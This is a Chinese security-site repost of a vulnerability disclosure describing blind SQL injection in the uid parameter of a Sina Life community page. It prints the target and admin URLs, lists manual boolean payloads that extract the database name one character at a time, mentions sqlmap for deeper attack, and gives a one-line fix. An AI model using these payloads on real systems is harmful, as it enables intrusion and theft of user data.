首页 网页制作网络编程脚本专栏数据库网站运营网络安全平面设计CMS教程

新浪生活服务互动社区Mysql盲注漏洞的介绍及其修复方法(图解)

所属分类: 网络安全 / 安全设置 阅读数: 116
收藏 0 赞 0 分享
注入漏洞存在地址为
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310
其中该漏洞可以导致数据泄漏,其中泄漏的数据包括团购,优惠券、以及用户联系方式,smslog,团购商户、admin等数据。
 
同时,团购的商户登陆地址为
http://life.sina.com.cn/tuanadmin
 
漏洞证明:下面为手工猜解数据库名的语句为
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and Length((database()))<5
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=108
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=105
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=102
http://life.sina.com.cn/act/cgi/mother/md?uid=1464029310 and ascii(substring((database()),1,1))=101
下图为注入是返回对正确与错误的截图
 
 
 
注入返回对的情况截图
 
 
 
注入时返回错的情况截图
 
一下是使用sqlmap对注入点进行注入攻击,一下该例为查询数据库banner,通过改变命令参数可以对其进行更深入的攻击。
 

 
修复方案:

对其uid参数进行检查并且进行过滤。
 
作者 Insight-labs
更多精彩内容其他人还在看

三年不重装 令Windows百毒不侵13妙招

前几天我朋友的电脑中了病毒,病毒感染了很多EXE文件,修复难度很大,无奈只好格式化掉,损失惨重。
收藏 0 赞 0 分享

加强企业Linux系统安全的若干方法

世界上没有绝对安全的系统,即使是普遍认为稳定的Linux系统,在管理和安全方面也存在不足之处。我们期望让系统尽量在承担低风险的情况下工作,这就要加强对系统安全的管理。
收藏 0 赞 0 分享

远程软件盗窃硬盘数据的3种防止方法

很多时候当一台计算机中毒以后,我们的远控软件就会查看到你硬盘的重要数据,从而将之盗取.
收藏 0 赞 0 分享

U盘病毒彻底防御办法

如何让U盘做到100%预防病毒。
收藏 0 赞 0 分享

Google 搜索时出现的G.cn渐隐广告的解决方法

今天到软件园下载了一个游戏,安装后发现了,用google搜索时出现g.cn的渐隐的广告,原来时这个垃圾软件的问题,国内的大软件网站也提供带插件的广告了。
收藏 0 赞 0 分享

流氓软件篡改ie主页伎俩分析

经常有朋友在安装某种小软件后,IE主页被篡改,而你在ie选项里改回来后,再打开又时主页又变成了另外一个网址。
收藏 0 赞 0 分享

15步安全强化win2003服务器

我们现在就来看看Jonathan的15个步骤以及他提到的一些要点。
收藏 0 赞 0 分享

曲折的FileZilla Server提权之路

明白以上三点后现在就是尝试如何连接到服务器上的FileZilla Server。首先查看FileZilla Server Interface.xml中的内容
收藏 0 赞 0 分享

在 Windows 下关闭135/139/445端口的图文方法

在 Windows 下关闭135/139/445端口的方法,一切为了安全
收藏 0 赞 0 分享

IIS的FastCGI漏洞处理方法

这篇文章主要介绍了IIS的FastCGI漏洞处理方法,需要的朋友可以参考下
收藏 0 赞 0 分享
查看更多

网络赚钱

更多

站长故事

更多
建站极客
合作伙伴
在线工具
建站极客移动版
聚合全网技术文章,根据你的阅读喜好进行个性推荐
© 2012 - 2020 zhanzhang360.cn Some Rights Reserved.
沪ICP备13040166号-22